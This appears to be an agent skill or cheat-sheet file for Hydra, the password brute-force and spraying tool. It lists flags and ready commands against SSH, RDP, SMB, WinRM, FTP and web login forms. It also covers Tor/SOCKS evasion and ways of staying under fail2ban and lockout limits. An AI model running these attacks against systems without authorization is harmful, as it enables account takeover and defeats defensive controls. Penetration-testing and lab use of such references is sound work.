By name: hydra description: "Auth/lab ref: Online brute-force and password spraying tool supporting 50+ protocols (SSH, HTTP, FTP, SMB, RDP, WinRM, and more)." license: AGPL-3.0 compatibility: "Linux, Windows, macOS." metadata: author: AeonDave version: "1.1"
Hydra
Fast, parallelized online password cracker for 50+ protocols.
Quick Start
# SSH brute-force
hydra -l admin -P passwords.txt ssh://192.168.1.10
# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.10 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
# Multiple users + passwords
hydra -L users.txt -P passwords.txt ssh://192.168.1.10
Core Flags
| Flag | Description |
|---|---|
-l <user> |
Single username |
-L <file> |
Username list |
-p <pass> |
Single password |
-P <file> |
Password list |
-u |
Loop users before passwords (default: passwords first) |
-C <file> |
Colon-delimited user:pass list |
-t <n> |
Threads per host (default 16) |
-T <n> |
Total parallel targets |
-s <port> |
Custom port |
-S |
Use SSL/TLS |
-o <file> |
Output found credentials |
-f |
Stop after first valid pair (per host) |
-F |
Stop after first valid pair (all hosts) |
-v |
Verbose |
-V |
Very verbose (show each attempt) |
-d |
Debug |
-R |
Restore previous session |
-I |
Ignore existing restore file (start fresh) |
-e nsr |
Try: n=empty pass, s=user as pass, r=reversed user |
-w <sec> |
Wait time for server response (default 32s) |
-W <sec> |
Wait between connect attempts per thread (rate throttle) |
-x proto |
SOCKS5/HTTP proxy: -x socks5://127.0.0.1:1080 |
Supported Modules (Common)
ssh, ftp, http-get, http-post-form, https-post-form, smb, rdp, winrm, imap, pop3, smtp, mysql, postgres, mssql, telnet, vnc, ldap2, redis
Common Workflows
# SSH with user list
hydra -L users.txt -P rockyou.txt ssh://10.10.10.10 -t 4
# HTTP form login
hydra -l admin -P passwords.txt 10.10.10.10 http-post-form \
"/admin/login.php:username=^USER^&password=^PASS^:Wrong password"
# RDP brute-force
hydra -l administrator -P passwords.txt rdp://10.10.10.10
# FTP
hydra -l ftp -P passwords.txt ftp://10.10.10.10
# SMB password spray (single password, many users)
hydra -L users.txt -p "Summer2024!" smb://10.10.10.10
# WinRM
hydra -l administrator -P passwords.txt winrm://10.10.10.10
# Rate-limited (avoid lockouts)
hydra -l admin -P passwords.txt ssh://10.10.10.10 -t 1 -W 3
Proxy / Evasion
# Route through SOCKS5 (Tor or pivoting)
hydra -l admin -P passwords.txt -x socks5://127.0.0.1:1080 ssh://10.10.10.10
# HTTP proxy
hydra -l admin -P passwords.txt -x http://127.0.0.1:8080 http-post-form \
"/login:user=^USER^&pass=^PASS^:Invalid"
Tips
- Use
-e nsrfor quick wins (null, same as user, reversed) - Set
-t 1-4for protocols with lockout policies (RDP, SMB, WinRM) -W 3adds 3s between connect attempts per thread — avoids fail2ban bans-wcontrols response timeout; increase for slow targets (e.g.,-w 10)- For HTTP forms: identify
failure_messagefrom the response body - Use
-Ito ignore leftover restore files from previous interrupted runs
Resources
| File | When to load |
|---|---|
references/protocols.md |
Module syntax for each protocol, POST form detection, HTTPS handling |